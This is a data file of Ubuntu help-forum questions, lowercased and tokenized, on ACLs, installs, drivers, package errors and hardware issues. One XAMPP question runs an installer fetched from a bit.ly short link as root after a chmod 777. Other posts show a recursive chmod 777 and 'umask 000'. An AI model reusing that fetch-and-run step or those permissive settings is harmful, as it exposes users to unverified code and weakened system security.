504192	set permissions for future folders and files	i have some trouble managing permits in a folder and relative sub folders . i am working on ubuntu 14.04 . i have a software which periodically creates new folders and files inside of a main folder . for example i have the main folder /media/folder and the software create the folder /media/folder/first_folder . when it creates the new folder , this one has no permits to write for the group and for other users . here the output of the ls -al command : drwxr-xr-x . the software also creates other folders inside of the previous one , for example /media/folder/first_folder/second_folder1 , /media/folder/first_folder/second_folder2 , and so on . i need to have full permits in all the subfolders and files , also the newly generated . i tried changing the permits recursively with the command : sudo chmod 777 -r /media/folder but when new folders are created those have no permits again . after this i tried modifying the acls but i 'm not really confident with these . here 's my getfacl screen : file : folder/ # owner : ubuntu # group : ubuntu # user : :rwx group : :rwx other : :rwx as you can see my owner and group are ubuntu : ubuntu . then i try to chenge the acl using the command : sudo setfacl -rdm g : ubuntu : rwx /media/folder/ and now the screen become this : # file : folder/ # owner : ubuntu # group : ubuntu user : :rwx group : :rwx other : :rwx default : user : :rwx default : group : :rwx default : group : ubuntu : rwx default : mask : :rwx default : other : :rwx which looks good . but if i create a new folder inside of it the getfacl screen is : # file : folder//first_folder # owner : ubuntu # group : ubuntu user : :rwx group : :r-x group : ubuntu : rwx mask : :rwx other : :r-x default : user : :rwx default : group : :rwx default : group : ubuntu : rwx default : mask : :rwx default : other : :rwx as you can see the line with 5 and 8 it miss the write permit . how can i have always all permits ? i mean also for the future folders and files . ps i tried also launching the commands : sudo setfacl -rdm o : :rwx /media/sources/previsioni/ and sudo setfacl -rdm g : :rwx /media/sources/previsioni/ . here 's my etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=9deb0e4a-b93e-4cc6-8bda-c41f5e9244c7 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=88be1282-e36e-49d4-820a-d05345addf5d none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 //master/triple_rdf /media/folder cifs credentials=/home/ubuntu/.smbcredentials 0 0 here 's my login.defs content : # /etc/login.defs - configuration control definitions for the login package . # # three items must be defined : mail_dir , env_supath , and env_path . # if unspecified , some arbitrary ( and possibly incorrect ) value will # be assumed . all other items are optional - if not specified then # the described action or option will be inhibited . # # comment lines ( lines beginning with `` # '' ) and blank lines are ignored . # # modified for linux . -- marekm # required for useradd/userdel/usermod # directory where mailboxes reside , _or_ name of file , relative to the # home directory . if you _do_ define mail_dir and mail_file , # mail_dir takes precedence . # # essentially : # - mail_dir defines the location of users mail spool files # ( for mbox use ) by appending the username to mail_dir as defined # below . # - mail_file defines the location of the users mail spool files as the # fully-qualified filename obtained by prepending the user home # directory before $ mail_file # # note : this is no more used for setting up users mail environment variable # which is , starting from shadow 4.0.12-1 in debian , entirely the # job of the pam_mail pam modules # see default pam configuration files provided for # login , su , etc . # # this is a temporary situation : setting these variables will soon # move to /etc/default/useradd and the variables will then be # no more supported mail_dir /var/mail # mail_file .mail # # enable logging and display of /var/log/faillog login failure info . # this option conflicts with the pam_tally pam module . # faillog_enab yes # # enable display of unknown usernames when login failures are recorded . # # warning : unknown usernames may become world readable . # see # 290803 and # 298773 for details about how this could become a security # concern log_unkfail_enab no # # enable logging of successful logins # log_ok_logins no # # enable `` syslog '' logging of su activity - in addition to sulog file logging . # syslog_sg_enab does the same for newgrp and sg . # syslog_su_enab yes syslog_sg_enab yes # # if defined , all su activity is logged to this file . # # sulog_file /var/log/sulog # # if defined , file which maps tty line to term environment parameter . # each line of the file is in a format something like `` vt100 tty01 '' . # # ttytype_file /etc/ttytype # # if defined , login failures will be logged here in a utmp format # last , when invoked as lastb , will read /var/log/btmp , so ... # ftmp_file /var/log/btmp # # if defined , the command name to display when running `` su - '' . for # example , if this is defined as `` su '' then a `` ps '' will display the # command is `` -su '' . if not defined , then `` ps '' would display the # name of the shell actually being run , e.g . something like `` -sh '' . # su_name su # # if defined , file which inhibits all the usual chatter during the login # sequence . if a full pathname , then hushed mode will be enabled if the # user 's name or shell are found in the file . if not a full pathname , then # hushed mode will be enabled if the file exists in the user 's home directory . # hushlogin_file .hushlogin # hushlogin_file /etc/hushlogins # # *required* the default path settings , for superuser and normal users . # # ( they are minimal , add the rest in the shell startup files ) env_supath path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin env_path path=/usr/local/bin : /usr/bin : /bin : /usr/local/games : /usr/games # # terminal permissions # # ttygroup login tty will be assigned this group ownership . # ttyperm login tty will be set to this permission . # # if you have a `` write '' program which is `` setgid '' to a special group # which owns the terminals , define ttygroup to the group number and # ttyperm to 0620 . otherwise leave ttygroup commented out and assign # ttyperm to either 622 or 600 . # # in debian /usr/bin/bsd-write or similar programs are setgid tty # however , the default and recommended value for ttyperm is still 0600 # to not allow anyone to write to anyone else console or terminal # users can still allow other people to write them by issuing # the `` mesg y '' command . ttygroup tty ttyperm 0600 # # login configuration initializations : # # erasechar terminal erase character ( '\010 ' = backspace ) . # killchar terminal kill character ( '\025 ' = ctrl/u ) . # umask default `` umask '' value . # # the erasechar and killchar are used only on system v machines . # # umask is the default umask value for pam_umask and is used by # useradd and newusers to set the mode of the new home directories . # 022 is the `` historical '' value in debian for umask # 027 , or even 077 , could be considered better for privacy # there is no one true answer here : each sysadmin must make up his/her # mind . # # if usergroups_enab is set to `` yes '' , that will modify this umask default value # for private user groups , i. e. the uid is the same as gid , and username is # the same as the primary group name : for these , the user permissions will be # used as group permissions , e. g. 022 will become 002 . # # prefix these values with `` 0 '' to get octal , `` 0x '' to get hexadecimal . # erasechar 0177 killchar 025 umask 000 # # password aging controls : # # pass_max_days maximum number of days a password may be used . # pass_min_days minimum number of days allowed between password changes . # pass_warn_age number of days warning given before a password expires . # pass_max_days 99999 pass_min_days 0 pass_warn_age 7 # # min/max values for automatic uid selection in useradd # uid_min 1000 uid_max 60000 # system accounts # sys_uid_min 100 # sys_uid_max 999 # # min/max values for automatic gid selection in groupadd # gid_min 1000 gid_max 60000 # system accounts # sys_gid_min 100 # sys_gid_max 999 # # max number of login retries if password is bad . this will most likely be # overriden by pam , since the default pam_unix module has it 's own built # in of 3 retries . however , this is a safe fallback in case you are using # an authentication module that does not enforce pam_maxtries . # login_retries 5 # # max time in seconds for login # login_timeout 60 # # which fields may be changed by regular users using chfn - use # any combination of letters `` frwh '' ( full name , room number , work # phone , home phone ) . if not defined , no changes are allowed . # for backward compatibility , `` yes '' = `` rwh '' and `` no '' = `` frwh '' . # chfn_restrict rwh # # should login be allowed if we ca n't cd to the home directory ? # default in no . # default_home yes # # if defined , this command is run when removing a user . # it should remove any at/cron/print jobs etc . owned by # the user to be removed ( passed as the first argument ) . # # userdel_cmd /usr/sbin/userdel_local # # enable setting of the umask group bits to be the same as owner bits # ( examples : 022 - > 002 , 077 - > 007 ) for non-root users , if the uid is # the same as gid , and username is the same as the primary group name . # # if set to yes , userdel will remove the userâ´s group if it contains no # more members , and useradd will create by default a group with the name # of the user . # usergroups_enab yes # # instead of the real user shell , the program specified by this parameter # will be launched , although its visible name ( argv [ 0 ] ) will be the shell 's . # the program may do whatever it wants ( logging , additional authentification , # banner , ... ) before running the actual shell . # # fake_shell /bin/fakeshell # # if defined , either full pathname of a file containing device names or # a `` : '' delimited list of device names . root logins will be allowed only # upon these devices . # # this variable is used by login and su . # # console /etc/consoles # console console : tty01 : tty02 : tty03 : tty04 # # list of groups to add to the user 's supplementary group set # when logging in on the console ( as determined by the console # setting ) . default is none . # # use with caution - it is possible for users to gain permanent # access to these groups , even when not logged in on the console . # how to do it is left as an exercise for the reader ... # # this variable is used by login and su . # # console_groups floppy : audio : cdrom # # if set to `` yes '' , new passwords will be encrypted using the md5-based # algorithm compatible with the one used by recent releases of freebsd . # it supports passwords of unlimited length and longer salt strings . # set to `` no '' if you need to copy encrypted passwords to other systems # which do n't understand the new algorithm . default is `` no '' . # # this variable is deprecated . you should use encrypt_method . # # md5_crypt_enab no # # if set to md5 , md5-based algorithm will be used for encrypting password # if set to sha256 , sha256-based algorithm will be used for encrypting password # if set to sha512 , sha512-based algorithm will be used for encrypting password # if set to des , des-based algorithm will be used for encrypting password ( default ) # overrides the md5_crypt_enab option # # note : it is recommended to use a value consistent with # the pam modules configuration . # encrypt_method sha512 # # only used if encrypt_method is set to sha256 or sha512 . # # define the number of sha rounds . # with a lot of rounds , it is more difficult to brute forcing the password . # but note also that it more cpu resources will be needed to authenticate # users . # # if not specified , the libc will choose the default number of rounds ( 5000 ) . # the values must be inside the 1000-999999999 range . # if only one of the min or max values is set , then this value will be used . # if min > max , the highest value will be used . # # sha_crypt_min_rounds 5000 # sha_crypt_max_rounds 5000 # # # # # # # # # # # # # # # # # obsoleted by pam # # # # # # # # # # # # # # # # # these options are now handled by pam . please # # edit the appropriate file in /etc/pam.d/ to # # enable the equivelants of them . # # # # # # # # # # # # # # # # # motd_file # dialups_check_enab # lastlog_enab # mail_check_enab # obscure_checks_enab # porttime_checks_enab # su_wheel_only # cracklib_dictpath # pass_change_tries # pass_always_warn # environ_file # nologins_file # issue_file # pass_min_len # pass_max_len # ulimit # env_hz # chfn_auth # chsh_auth # fail_delay # # # # # # # # # # # # # # # # # obsoleted # # # # # # # # # # # # # # # # # # # # # # # # # # these options are no more handled by shadow . # # # # shadow utilities will display a warning if they # # still appear . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # close_sessions # login_string # no_password_console # qmail_dir
504193	problem with ubuntu install onto secondary hdd , no grub	i have two drives in my dell inspiron n5010 laptop . one samsung ssd and one hitachi hdd via hdd frame . i tried to install ubuntu onto my hdd . i made a partition for ubuntu . in the beginning of the install i didn’t see the partitions just the hard drive . i thought it’s not a big deal i install it alongside windows 7 . according to my searching the installer would have to ask the size of ubuntu partition . it did not . the installer began . it was strange but i did not care . after the installer finished and the laptop rebooted the grub rescure booted . great . i started the ubuntu in try mode and i saw the hdd drive was formatted and the ubuntu istalled on this drive . what ? – i thought . the ubuntu istaller formatted my hdd with all datas on it . could you please help me ? i really would like to use ubuntu . unfortunately i can’t shrink my ssd drive ( c : ) because only 5gb allowed . i would like to make two partitions on my hdd drive and install the ubuntu onto one partition . i am sorry about my english if there’s any mistake .
504194	novatech elite n1716 /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed	for some reason pwm does n't detect my fan sensor modules . here is the output of pwmconfig $ sudo pwmconfig # pwmconfig revision 6166 ( 2013-05-01 ) ( ... ) /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed here is the output of sensors acpitz-virtual-0 adapter : virtual device temp1 : +64.8°c ( crit = +159.8°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +66.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +66.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +66.0°c ( high = +87.0°c , crit = +105.0°c ) core 2 : +65.0°c ( high = +87.0°c , crit = +105.0°c ) core 3 : +65.0°c ( high = +87.0°c , crit = +105.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +511.0°c ( crit = +120.0°c , hyst = +90.0°c ) when i run sensors-detect ( with default values ) this is the output : http : //pastebin.com/u0ql654r
504203	installation on virtual lvm disks without partitions	i am installing an ubuntu server in a kvm/libvirt vm with the text/console installer . i intend to hand over two lvm volumes as root and swap to the vm as virtual disks . they are detected correctly as vda and vdb , however the installer seems to force me to partition those as disks , which would defeat the flexibility of lvm . how can i install ubuntu with formatting the virtual disks directly instead of using partitions , or is this a bad idea ? motivation : the whole point is to reduce the complexity by removing an unnecesary level of abstraction from the storage hierarchy . physical drives : host : /dev/sd { a , b } paritioning : host : /dev/sd { a , b } 1 sw-raid : host : /dev/md1 lvm : host : /dev/vg0/mylv_root virtio disk guest : /dev/vda partitioning : guest : /dev/vda1 filesystem : guest : / in this layout , when allocation additional space to a single vm i have to go though these steps : 4. lvresize 6. parted , which is especially ugly 7. resize2fs to reduce allocated space the other way around ( which is even more ugly ) . for backups ( e.g . with lvcreate -- snapshot ) , there is an additional step of kpartex as explained by psusi . i want to remove 6. from the equation because i do n't see what value this abstraction provides . but it does cost by addition complexity , possible performance impact , and small space waste . hacky solution : using kpartx i was able to move the root filesystem from a `` bootstrap partition '' ( within another temporary logical volume ) to the target logical volume and then boot via direct kernel boot . kpartx -a /dev/vg0/mylv_bootstrapper dd if=/dev/mapper/vg0-mylv_bootstrapper1 of=/dev/vg0/mylv_root bs=4m e2fsck -f /dev/vg0/mylv_root # edit fstab inside /dev/vg0/mylv_root accordingly resize2fs /dev/vg0/mylv_root kpartx -d /dev/vg0/mylv_bootstrapper however : this feels oddly hacky . i do n't really like the idea of direct kernel boot as i would have to manually update the kernel version of the guest in the host each time the kernel is upgraded .
504204	access forbidden 403 error in xampp	i am very new to xampp . i have made a fresh xampp install with the following commands . sudo su cd /tmp wget bit.ly/1cmyruo -o xampp-32bit.run chmod 777 ./xampp-32bit.run sudo ./xampp-32bit.run then i made a perl file to check whether my xampp works . the following is my sample.pl file content . # ! usr/bin/perl print `` content-type : text/html\n '' ; print ( header ( ) ) ; use cgi qw ( : standard ) ; print ( start_html ( ) ) ; print `` hello . i am ram '' ; print ( end_html ( ) ) ; after copying my perl file from /home/vicky/desktop to /opt/lampp/cgi-bin . i started my xampp with the following command . /opt/lampp/lampp start then i ran my sample.pl in the localhost with the help of the http : //localhost/cgi-bin/sample.pl in my mozilla browser . i just got the following window . i found only answers relating to the 'new security concept error ' and 'accessing virtual host issue ' . i did came across an askubuntu query , a bid similar to that of mine . it had no answers but some comments . one comment suggested to change the file permissions . it directed to get help from here . it said to change the directory permission as 755 and file permission as 644 to resolve this kind of issue . when i tried to do that , i came to know that my cgi-bin directory already had 755 permission and my sample.pl had 644 permission . i have no solutions now . postscript : i have attached the content of my /opt/lampp/apache2/conf/httpd.conf file . hope this will help the answer-providers to understand my problem completely . alias /bitnami/ `` /opt/lampp/apache2/htdocs/ '' alias /bitnami `` /opt/lampp/apache2/htdocs '' < directory `` /opt/lampp/apache2/htdocs '' > options indexes followsymlinks allowoverride all order allow , deny allow from all < /directory >
504205	re-order open program tabs in panel/taskbar	is there anything like this for xfce or any other desktop ? i tried this and i can drag but when i drop the open program window it goes back to where i dragged it from .
504206	shotwell wo n't start after restoring my home folder	i upgraded from 12.04 to 14.04 but had issues that meant i decided to return to 12.04 . i did a full reinstall formatting the drive and then used back-in-time to restore the home folders ( last snapshot was made in 14.04 ) . everything seems to work except shotwell . i tried reinstalling and still get the same error . when running shotwell from terminal i get the error : unique-gdbus-warning ** : error while sending message : timeout was reached sometimes i was able to get shotwell to open but then it immediately stopped responding . i have also tried using a different photo management app ( darktable ) and it also gave the same error .
504210	ubuntu not running on vmware	i downloaded ubuntu x64 for desktop and then i installed it on vmware ( non commercial use version ) . when i run it is only until to the opening ubuntu logo . and it does n't move forward from that . system : hp envy ts 15 windows 8.0 64 bits 16gb ram allocated for ubuntu 40gb
504213	( us , alternative international ) keyboard in tty console	is it possible to use the us , alternative-international keyboard in my tty console ? if not , is there a way i can use it in vim inside the tty console ?
504220	setup a mail server	everyone please contribute your time explaining each and every part for the configuration of the mailing server . answer must contain basic steps to advanced steps . prerequisites with hardening security and hackers alerts tips . and you can mention things that 's necessary , might be a big help for all of us reading this post . i need to know what are the prerequisites for setup a mail-server ? configuration i have an old pc . and what to convert it into a server for personal use . it configuration is 1gb ram and 100gb hdd . and i was thinking to run it using ubuntu server . what should i do next ? and is the configuration perfect ?
504221	how to make `ctrl + ` command cross language ?	i have 2 input languages in my computer : english and hebrew . my os language is english . anyways , my ctrl + command are working only when i 'm on english . for example : ctrl + c will work only on english . same for the rest of these commands . in windows it does n't matter the language you are at . to be honest i have fedora 20 , but if you give me the solution for ubuntu i 'll be able to solve it here . how to get the same in feodra ? thanks in advance .
504222	how to make my computer start as ubuntu not lubuntu	i have computer with ubuntu and lubuntu . when i start the computer it shows the lubuntu logo then goes to the lubuntu login screen . i want it to start the computer showing the ubuntu logo and going to the ubuntu login screen .
504223	mute built-in speakers without muting external output speakers/headphones from command line	i have been looking for an answer for this and couldnâ´t find one . i am trying to mute/unmute the built-in speakers of my comuter from the command line without affecting the external speakers connected to the output jack of the soundcard . so far i found these commands to mute/unmute from the command line , but both commands also mute/unmute the external speakers : pactl set-sink-mute 1 0 amixer sset speaker mute i am running ubuntu 13.10 on a dell optiplex 760 pentium 4 the sink 0 device is the hdmi audio output of the nvidia video card , but im not interested in that one for this script . it seems the sink 1 device controls both the builtin speakers and the external output speakers . i canâ´t find a way to distinguish between both . any ideas ? if you need more information that can point me to a solution please let me know
504227	what is the purpose of /etc/init/udev-fallback-graphics.conf in ubuntu 14.04 ?	what is the purpose of the upstart configuration /etc/init/udev-fallback-graphics.conf ( shown below ) in ubuntu 14.04 lts ? # fallback-graphics - take actions to initiate fallback graphics # # if we have cold plugged everything and not yet seen a valid graphics # device , # shove a fallback framebuffer into the mix and hope for the best . description `` load fallback graphics devices '' # we only want this job to happen once per boot , hence 'startup and ... ' . start on ( startup and ( graphics-device-added primary_device_for_display=1 or drm-device-added primary_device_for_display=1 or stopped udevtrigger or container ) ) task script if [ `` $ primary_device_for_display '' = `` '' ] ; then modprobe -q -b vesafb fi end script i would think it would rarely be invoked , unless a video graphics driver is missing . if a graphics driver is missing , there 's still no guarantee that modprobe -b -q vesafb will succeed . if it fails , the script exits with the return code from modprobe and /var/log/boot.log will contain a message similar to the following : * starting load fallback graphics devices [ 74g [ [ 31mfail [ 39 ; 49m ] the message is not very informative . the script code in the upstart configuration looks like a kludge to me . i would rather see a specific warning or error message displayed if the return code from modprobe indicates failure , e.g. , modprobe -q -b vesafb || echo `` no suitable graphics driver found . ''
504229	upgrade to 14.04 interrupted , back to 13 , dash broken	need to get the dash back and running so i can upgrade to 14.04 what to do ? ca n't get to root , synaptic nor software updater .
504237	shotwell can not mount device error 53	i would report this as a bug , but i 'm in my 50s and reading the bug reporting requirements would make me a bug specialist and take me about a week to insure i was reporting it properly . i 'm an end user . sorry . on installation of 14.04.1 about 5 days ago and on plugging into a usb 2.0 from computer to nikon l20 camera , shotwell reports : shotwell unable to fetch previews from the camera : could not claim the usb device ( -53 ) this is a bug , as netsearching the above shows a canon camera as having the same report . if the camera , while connected via usb cable to the computer is powered up , the above is the error message . see launchpad https : //answers.launchpad.net/ubuntu/+source/shotwell/+question/157569 for other infos . if you read this and can make a launchpad bug report please do so . if i can help in any way whatsoever , let me know . thank you , ubuntu community .
504239	kernel crash after applying kde window theme unsuccessfully ?	i had been trying a bunch of different themes in kde just because i kind of like to do that ( do n't judge me ) and when applying a theme that emulates the windows 7 titlebar , kwin and kde started crashing a ton and i had to do a force reboot with alt+sysrq+b and when it started the load screen , i got a kernel crash a few seconds after that and i have not been able to boot it since . i will post a picture in a moment as i have to reproduce it . i am running kubuntu 14.04 , also this seemed to coincide with being the boot after i installed a bunch of des like pantheon , mate , gnome 2 flashback , and unsuccessfully installing yet another that i do n't quite remember the name of . edit : here is the link to a picture of the kernel panic : https : //drive.google.com/file/d/0bxwyn8k9rd7zdhg0ltdjdepxv3c/edit ? usp=sharing please help i need to boot this as i need it for a summer assignment !
504240	how to change the caret of the gnome terminal ?	how do you change the text-cursor/caret in terminal to block , i-beam , or underline .
504242	ctrl+alt+f1 shuts down laptop	ubuntu 14.04 on sony vaio vgn-fw31zj . whenever i try to switch to a tty , say by pressing ctrl+alt+f1 , the system shuts down . the text username prompt appears for a split second but quickly everything goes black . i then have to press and hold the on/off chassis button and wait for the whole start up process to go through : bios , grub and so on . i have used ubuntu on this laptop since 8.10 and never had such odd behaviour . what is going wrong ? update : this is now bug # 1350513 at launchpad .
504244	ubuntu toolbars changed to a different color and style when i booted up	when i booted into ubuntu , the bar on the top of the screen and also all the web browser tabs had changed to a kde style . i used to have kde installed , but i uninstalled it a while back . how can i change them back to the default ?
504245	adding users with my same configuration	i want to add a user in the way it preserves my actual configuration ( basically access to local programs ) but without administrator privileges . is it possible ? the basic code : sudo adduser username does n't work .
504246	broken apt-get state after apache install error	i tried to install php5 via sudo apt-get install php5 on my ubuntu 14.04 machine . it did n't install properly , because there were problems with the package apache2 . so if i try to install anything , i just get die folgenden pakete haben unerfüllte abhängigkeiten : libapache2-mod-php5 : hängt ab von : apache2 ( > = 2.4 ) soll aber nicht installiert werden e : unerfüllte abhängigkeiten . versuchen sie »apt-get -f install« ohne angabe eines pakets ( oder geben sie eine lösung an ) . or in english ( roughly translated ) the following packages have unmet dependencies : libapache2-mod-php5 : depending : apache2 ( > = 2.4 ) but shall not be installed e : unmet dependencies . try `` apt-get -f install '' without a package . when i run the the recommended command , i get vorbereitung zum entpacken von ... /apache2_2.4.7-1ubuntu4.1_amd64.deb ... /var/lib/dpkg/tmp.ci/preinst : zeile 118 : a2query : kommando nicht gefunden . dpkg : fehler beim bearbeiten des archivs /var/cache/apt/archives/apache2_2.4.7-1ubuntu4.1_amd64.deb ( -- unpack ) : unterprozess neues pre-installation-skript gab den fehlerwert 1 zurück fehler traten auf beim bearbeiten von : /var/cache/apt/archives/apache2_2.4.7-1ubuntu4.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) again , a poor translation : preparing extraction ... /apache2_2.4.7-1ubuntu4.1_amd64.deb ... /var/lib/dpkg/tmp.ci/preinst : line 118 : a2query : command not found . dpkg : error with processing the archive /var/cache/apt/archives/apache2_2.4.7-1ubuntu4.1_amd64.deb ( -- unpack ) : subprocess new pre-installation-skript returned error value 1 errors occured while processing : /var/cache/apt/archives/apache2_2.4.7-1ubuntu4.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i fix that now ? any installation requires me to finish this apache installation stuff , which never works . any help appreciated .
504247	how to make unity desktop webapp ( not touch )	i want to make an ubuntu desktop app that will display my website , kind of like the amazon app that comes in the default installation . i am not trying to make an app for ubuntu touch , nor setting up my website so it will have unity integration when users visit it with mozilla firefox . i want mine to be just like the amazon app . it will have an icon , and wo n't let users navigate away from my site . ( if people click a link on my site to say , facebook.com , i do n't want it to let them go there . ) is there an easy way to make one of these ?
504248	how to activate root user	i 'd prefer to use root user as my default user instead of writing sudo command to get temporary root access . is the root user disabled by default ? how can i start using root user ? what are the costs/benefits of this ? ps : i 'm using ubuntu 14.04 lts and i 'm completely new in linux world . thanks ,
504251	jerky , shaking display	lubuntu 14.04 installed on an hp pavilion a520n amd athlon ( b ) xp 3200+ 2.20ghz/400 mhz nvidia nforce2 igp results in jerky and shaking display . symptoms appear as soon as installation is started . linux opensuse 13.1 and ubuntu show the same symptoms .
504253	computer does not detect game controller input	i have tried using ps3 , ps4 , and xbox360 controllers to play games on my ubuntu system that is running xfce with no luck . in every case , the controller is detected and registers as the type of controller that it actually is , but no buttons or any other form of input is detected by my machine . i have tried calibrating them with jstest-gtk and i have tried watching for input with evtest . neither of them have shown any activity for any controller , even though they are registered and detected properly . does anyone know why this might be happening ? i am using ubuntu 14.04 , codename trusty .
504255	why are microsoft hyper-v drivers split into two packages ?	after installing ubuntu server 14.04 lts as a microsoft hyper-v guest os , i see that there appear to be several hyper-v-specific drivers loaded : $ lsmod | egrep ' ( hv|hyperv ) ' | sort hid 106148 2 hid_hyperv , hid_generic hid_hyperv 13059 0 hv_balloon 21513 0 hv_netvsc 31255 0 hv_storvsc 17785 2 hv_utils 19003 0 hv_vmbus 50383 7 hv_balloon , hyperv_keyboard , hv_netvsc , hid_hyperv , hv_utils , hyperv_fb , hv_storvsc hyperv_fb 17593 1 hyperv_keyboard 12777 0 six of the drivers are in contained package linux-image- $ ( uname -r ) : $ dpkg -- listfiles linux-image- $ ( uname -r ) | egrep ' ( hv|hyperv ) . *\.ko ' | sort /lib/modules/3.13.0-32-generic/kernel/drivers/hv/hv_balloon.ko /lib/modules/3.13.0-32-generic/kernel/drivers/hv/hv_utils.ko /lib/modules/3.13.0-32-generic/kernel/drivers/hv/hv_vmbus.ko /lib/modules/3.13.0-32-generic/kernel/drivers/input/serio/hyperv-keyboard.ko /lib/modules/3.13.0-32-generic/kernel/drivers/net/hyperv/hv_netvsc.ko /lib/modules/3.13.0-32-generic/kernel/drivers/scsi/hv_storvsc.ko the remaining two drivers are contained in package linux-image-extra- $ ( uname -r ) : $ dpkg -- listfiles linux-image-extra- $ ( uname -r ) | egrep ' ( hv|hyperv ) . *\.ko ' | sort /lib/modules/3.13.0-32-generic/kernel/drivers/hid/hid-hyperv.ko /lib/modules/3.13.0-32-generic/kernel/drivers/video/hyperv_fb.ko why is this so ? why not include all the hyper-v-specific drivers in the same package ?
504256	ubuntu 12.04 comes out of hibernate/standby randomly on dell xps 13	i have an ubuntu 12.04 laptop and it comes out of hibernate or standby randomly . for example , yesterday i selected hibernate , closed the lid and put it in my computer bag . 24 hours later , it is still closed , in the bag , not doing anything . ( i check it was there , not running , cold . six hours later it has come out of hibernation , has 3 % battery left and has overheated to the point i ca n't recharge the battery . this has happened without opening the lid . this has happened a few times before , where i put it on standby or hibernate , close the lid and i come to use it hours later and find it is running again even though the lid is still closed . the only way to prevent this at the moment is to do a full shutdown . is there a way to prevent it coming out of hibernate or stand by spuriously . note : even if it does come out of hibernate it is set to hibernate after 30 minutes idle , which it does n't do , it just runs until the battery is flat .
504258	conky widgets are not working	i installed conky-manager from ppa and many widgets are n't working . actually only all in one circle widget ( my-wehather indicator ) is working ... in unity , just select one more widget besides `` all in one circle '' and what happens is : upon starting , the second widget is visible with no other object ( folders/files ) on desktop . after i open some application , if i show desktop , everything is at its place , with the `` all in one circle '' widget and no trace of the second widget . with xfce everything is working , except for opacity .
504261	ubuntu send alert mail if cpu usage continusly heigher than a certain amount	i need a way to send alert email if the cpu usage is higher than 80 % for more than 5 minute . installing new software on the server not allowed for me . is there any way to handle it through a shell script and a scheduled cron job ?
504262	issue with resume from standby , this is very strange !	i have a very strange issue with resume from standby , pm-standby issued manually via a console either in x or a separate console works , the system goes to standby correctly and resumes back to the original screen when triggered , if ( console triggered ) switch back to x everything still is working ok , even works from within an x console ok. standby command issued from top menu x either unity or xfce ( probably others too ) results in a blank screen on resume . system is an imac with ati radeon x1600 , ubuntu 14.0+mac 14.04 . even though the blank screen is there when x does not display i can still swap to a non x console , kill x and then get gdm login again ... if anyone has a clue whats going on pls let me know , seems like it may be a bug in x ? or a driver related issue ?
504266	installing wine on lubuntu but getting errors , unable to correct problems , you have held broken packages	i installed lubuntu 14.04 from the official website and installed successfully ( clicked download updates while installing and install third party software ) so now i added the wine repository which was available on winehq.org then i clicked on the apt link ( winehq.org ) but it gave me `` package dependencies could not be resolved '' . i used the terminal to add the i386 architecture then typed sudo apt-get update but still no luck . azam @ hamson786 : ~ $ sudo dpkg -- add-architecture i386 azam @ hamson786 : ~ $ sudo apt-get -f install wine1.4-i386 reading package lists ... done building dependency tree reading state information ... done note , selecting 'wine1.7-i386 ' instead of 'wine1.4-i386' some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.7-i386 : depends : libopenal1 ( > = 1:1.13 ) but it is not installable depends : wine1.7 : any ( = 1:1.7.22-0ubuntu1 ) recommends : libasound2-plugins but it is not installable recommends : libcapi20-3 but it is not installable recommends : libosmesa6 but it is not installable recommends : unixodbc but it is not installable recommends : wine-gecko2.24 but it is not going to be installed recommends : wine-mono4.5.2 but it is not going to be installed e : unable to correct problems , you have held broken packages . azam @ hamson786 : ~ $ sudo dg libudev1 sudo : dg : command not found azam @ hamson786 : ~ $ sudo apt-get install libudev1 reading package lists ... done building dependency tree reading state information ... done libudev1 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . azam @ hamson786 : ~ $ sudo apt-get instal libopenal1 e : invalid operation instal azam @ hamson786 : ~ $ sudo apt-get install lintian reading package lists ... done building dependency tree reading state information ... done package lintian is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'lintian ' has no installation candidate azam @ hamson786 : ~ $ sudo apt-get install binfmt-support reading package lists ... done building dependency tree reading state information ... done package binfmt-support is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'binfmt-support ' has no installation candidate azam @ hamson786 : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . azam @ hamson786 : ~ $ sudo apt-get install wine1.5 reading package lists ... done building dependency tree reading state information ... done package wine1.5 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : wine1.7 e : package 'wine1.5 ' has no installation candidate azam @ hamson786 : ~ $ sudo apt-get install wine1.7 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.7 : depends : wine1.7-i386 ( = 1:1.7.22-0ubuntu1 ) but it is not going to be installed depends : binfmt-support ( > = 1.1.2 ) but it is not installable recommends : cups-bsd but it is not going to be installed recommends : gnome-exe-thumbnailer but it is not installable or kde-runtime but it is not installable recommends : ttf-mscorefonts-installer but it is not installable recommends : fonts-horai-umefont but it is not installable recommends : fonts-unfonts-core but it is not installable recommends : ttf-wqy-microhei but it is not installable recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages
